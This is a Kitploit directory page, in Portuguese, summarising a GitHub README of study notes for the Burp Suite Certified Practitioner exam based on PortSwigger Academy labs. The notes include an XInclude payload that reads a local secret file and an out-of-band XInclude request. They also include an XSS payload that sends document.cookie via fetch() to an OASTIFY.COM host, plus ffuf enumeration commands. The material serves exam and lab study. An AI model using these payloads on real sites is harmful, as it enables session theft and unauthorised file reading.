Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

FeedsContatoPrivacidade© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Burp-Suite-Certified-Practitioner-Exam-Study — Notas de estudo práticas e walkthroughs para os laboratórios da PortSwigger Academy, abordando vulnerabilidades web, payloads, enumeração e estratégias para o exame BSCP. | Kitploit
Ferramentas/GitHubGitHub/botesjuan/burp-suite-certified-practitioner-exam-study
Análise de VulnerabilidadesExploração de Aplicações WebColeta de InformaçõesSegurança WebTestes de PenetraçãoAprendizado e EducaçãoRecursos CuradosDesenvolvimento de Payloads
Trilhas e Cursos
Labs e Prática
Top em Trilhas e Cursos nº9
GitHubbotesjuan/burp-suite-certified-practitioner-exam-study

Burp-Suite-Certified-Practitioner-Exam-Study

Notas de estudo práticas e walkthroughs para os laboratórios da PortSwigger Academy, abordando vulnerabilidades web, payloads, enumeração e estratégias para o exame BSCP.

Ver Repositório
1.5k385172há 1 mêsRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Estudo para o Exame Burp Suite Certified Practitioner

Estas são as minhas notas de estudo com mais de 110 laboratórios da PortSwigger Academy.
Usei estes laboratórios para passar no exame Burp Suite Certified Practitioner 2023.
Minha qualificação BSCP.
Para mais informações, acesse a PortSwigger Academy para obter os materiais de aprendizagem mais recentes.


VARREDURA - Enumeração
Foco na Varredura
Varredura de entidades não padronizadas

FOOTHOLD - Etapa 1
Descoberta de Conteúdo
DOM-XSS
XSS Cross Site Scripting
Envenenamento de Cache Web
Cabeçalhos de Host
Contrabando de Requisições HTTP
Força bruta
Autenticação

ESCALAÇÃO DE PRIVILÉGIOS - Etapa 2
CSRF - Tomada de Conta
Redefinição de Senha
SQLi - Injeção de SQL
JWT - JSON Web Tokens
Poluição de Protótipo
Teste de API
Controle de Acesso
Endpoints de API GraphQL
CORS - Compartilhamento de Recursos entre Origens

EXFILTRAÇÃO DE DADOS - Etapa 3
XXE - Entidades XML e Injeções
SSRF - Falsificação de solicitação do lado do servidor
SSTI - Injeção de template no lado do servidor
SSPP - Poluição de Protótipo no Lado do Servidor
LFI - Travessia de caminho de arquivo
Upload de Arquivos
Desserialização
Injeção de Comandos do SO

APÊNDICE
Scripts Python
Payloads
Listas de palavras
Foco na varredura de alvos
Abordagem
Conteúdo de Treinamento Extra

Minhas Dicas de Burp

Eu recomendo fazer o maior número possível de Mystery lab challenge para testar suas habilidades e reduzir o tempo que você leva para identificar as vulnerabilidades, antes de fazer o exame.
Também achei este conselho da PortSwigger sobre Refazer o exame muito informativo.
Assista CryptoCat - Burp Suite Certified Professional (BSCP) Review + Tips/Tricks para uma visão renovada do exame BSCP em 2024.




Buy Me A Coffee

Obrigado pelo café, \o/

Meu certificado de Burp Suite Certified Practitioner.


Varredura

A enumeração das aplicações web começa com varredura inicial e direcionada em um teste com tempo limitado.

Foco na Varredura
Varredura de entidades não padronizadas

Foco na Varredura

Devido ao limite de tempo apertado durante os testes ou o exame, faça a varredura de pontos de inserção definidos para solicitações específicas.

scan-defined-insertion-points

O scanner detectou a vulnerabilidade de injeção de XML no parâmetro storeId, o que levou à leitura do arquivo secreto de Carlos.```xml <xi:include parse="text" href="file:///home/carlos/secret"/>

>Solicitação XInclude fora de banda, precisa de um DTD hospedado para ler o arquivo local.```xml
<hqt xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include href="http://OASTIFY.COM/foo"/></hqt>

PortSwigger Lab: Descobrindo vulnerabilidades rapidamente com varredura direcionada

Varredura de estruturas de dados não padronizadas

Varredura de estruturas de dados não padronizadas usando o recurso do Burp para escanear o ponto de inserção selecionado em busca de texto selecionado em respostas ou solicitações.

scan-selected-insertion-point

Identifique a vulnerabilidade por meio dos resultados de problemas do scanner do Burp.
Neste caso, usando o XSS identificado, roube os cookies do usuário administrador criando o payload no ponto de inserção identificado.``` '"><svg/onload=fetch(//OASTIFY.COM/${encodeURIComponent(document.cookie)})>:CURRENT-USER-LOGIN-COOKIE-2ND-PART

>Aplique URL encoding aos caracteres-chave.  

![admin-cookie-stealer](https://assets.kitploit.com/production/public/readmes/51008/64ba64b0fa7e1681859eb5d76a88f94fb91a78655f1ce768ff8e1b50f3cf57c1/990ac058ff6a9727193848c821acf60a43011fa7ba8dfd967ab6b3dd7f2e0bcb-display-v1.webp)  

>Use o cookie do usuário administrador para acessar o painel administrativo, substituindo-o na sessão atual do navegador.  

[PortSwigger Lab: Scanning non-standard data structures](https://portswigger.net/web-security/essential-skills/using-burp-scanner-during-manual-testing/lab-scanning-non-standard-data-structures)  
    
-----

# Acesso Inicial  
  
# Descoberta de Conteúdo  

>A enumeração do alvo começa com fuzzing de diretórios e arquivos web. Use as ferramentas de engajamento do Burp, a opção de descoberta de conteúdo para encontrar caminhos e arquivos ocultos, ou use `FFUF` para enumerar diretórios e arquivos web. Examinar o `robots.txt` ou o `sitemap.xml` pode revelar conteúdo.```bash
wget https://raw.githubusercontent.com/botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/main/wordlists/burp-labs-wordlist.txt

ffuf -c -w ./burp-labs-wordlist.txt -u https://TARGET.web-security-academy.net/FUZZ

Ferramenta de engajamento do Burp, descoberta de conteúdo usando minha lista de palavras compilada burp-labs-wordlist como lista de arquivos personalizada.

content-discovery.png

Baixar ferramenta